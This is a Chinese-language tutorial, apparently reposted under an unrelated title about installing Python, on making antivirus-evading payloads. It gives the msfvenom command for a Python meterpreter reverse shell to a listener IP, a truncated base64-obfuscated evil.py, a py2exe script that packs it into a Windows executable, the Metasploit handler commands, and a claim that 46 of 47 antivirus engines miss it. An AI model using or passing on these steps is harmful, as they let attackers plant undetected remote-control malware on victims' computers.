python安装教程非常详细使⽤Python进⾏防病毒免杀解析
⽬录
0x01 环境准备
0x02 py2exe 打包Python程序
0x03 设置监听端⼝
0x04 免杀验证
很多渗透⼯具都提供了权限维持的能⼒,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意⾏为。在探讨⼀个权限维持技巧的时候,似乎越来越多的⼈关注的是,这个⽅式会
不会被被杀软杀掉?
打造免杀的payload成了⼀个很重要的话题,在这⾥,本⽂将介绍如何使⽤Pyhton轻松绕过防病毒软件。
0x01 环境准备
1、软件安装
2、msfvenom⽣成Python Payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py
evil.py 代码如下:
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCX 0x02 py2exe 打包Python程序
将evil.py复制到windows,同时创建⼀个setup.py⽂件:
import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)
下⾯的⽅法运⾏ evil.py,⽣成可执⾏⽂件。
python ./setup.py py2exe
0x03 设置监听端⼝
Kali 运⾏Metasploit,设置监听:
msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run
在Windows中运⾏,获得⼀个meterpreter的会话
0x04 免杀验证
确认⽣成的exe⽂件可正常⼯作,接下来对进⾏在线病毒扫描,以确认免杀效果如何。
这⾥我们使⽤-多引擎在线病毒扫描⽹ v1.02,当前⽀持 47 款杀毒引擎
扫描结果:47款杀毒引擎中,只有⼀个引擎报毒,主流的杀毒软件全部绕过。
参考⽂章:
总结
以上所述是⼩编给⼤家介绍的使⽤Python进⾏防病毒免杀,希望对⼤家有所帮助,如果⼤家有任何疑问请给我留⾔,⼩编会及时回复⼤家的。在此也⾮常感谢⼤家对⽹站的⽀持!如果你觉得本⽂对你有帮助,欢迎转载,烦请注明出处,谢谢!
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论